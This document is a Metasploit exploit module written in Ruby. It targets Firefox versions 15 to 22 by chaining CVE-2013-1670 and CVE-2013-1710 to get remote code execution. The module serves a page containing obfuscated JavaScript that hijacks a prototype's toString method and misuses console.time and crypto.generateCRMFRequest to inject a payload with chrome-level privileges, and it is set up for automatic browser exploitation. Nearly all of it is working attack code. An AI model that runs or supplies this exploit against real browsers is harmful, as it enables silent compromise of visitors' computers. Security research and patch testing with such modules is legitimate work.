Firefox toString console.time Privileged Javascript Injection

##

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

require 'rex/exploitation/jsobfu'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::BrowserExploitServer

include Msf::Exploit::Remote::BrowserAutopwn

include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

autopwn_info({

:ua_name => HttpClients::FF,

:ua_minver => "15.0",

:ua_maxver => "22.0",

:javascript => true,

:rank => ExcellentRanking

})

def initialize(info = {})

super(update_info(info,

'Name' => 'Firefox toString console.time Privileged Javascript Injection',

'Description' => %q{

This exploit gains remote code execution on Firefox 15-22 by abusing two separate

Javascript-related vulnerabilities to ultimately inject malicious Javascript code

into a context running with chrome:// privileges.

},

'License' => MSF_LICENSE,

'Author' => [

'moz_bug_r_a4', # discovered CVE-2013-1710

'Cody Crews', # discovered CVE-2013-1670

'joev' # metasploit module

],

'DisclosureDate' => "May 14 2013",

'References' => [

['CVE', '2013-1670'], # privileged access for content-level constructor

['CVE', '2013-1710'] # further chrome injection

],

'Targets' => [

[

'Universal (Javascript XPCOM Shell)', {

'Platform' => 'firefox',

'Arch' => ARCH_FIREFOX

}

],

[

'Native Payload', {

'Platform' => %w{ java linux osx solaris win },

'Arch' => ARCH_ALL

}

]

],

'DefaultTarget' => 0,

'BrowserRequirements' => {

:source => 'script',

:ua_name => HttpClients::FF,

:ua_ver => lambda { |ver| ver.to_i.between?(15, 22) }

}

))

register_options([

OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])

], self.class)

end

def on_request_exploit(cli, request, target_info)

send_response_html(cli, generate_html(target_info))

end

def generate_html(target_info)

key = Rex::Text.rand_text_alpha(5 + rand(12))

opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin

js = Rex::Exploitation::JSObfu.new(%Q|

var opts = #{JSON.unparse(opts)};

var key = opts['#{key}'];

var y = {}, q = false;

y.constructor.prototype.toString=function() {

if (q) return;

q = true;

crypto.generateCRMFRequest("CN=Me", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", null, key, 1024, null, "rsa-ex");

return 5;

};

console.time(y);

|)

js.obfuscate

%Q|

<!doctype html>

<html>

<body>

<script>

#{js}

</script>

#{datastore['CONTENT']}

</body>

</html>

|

end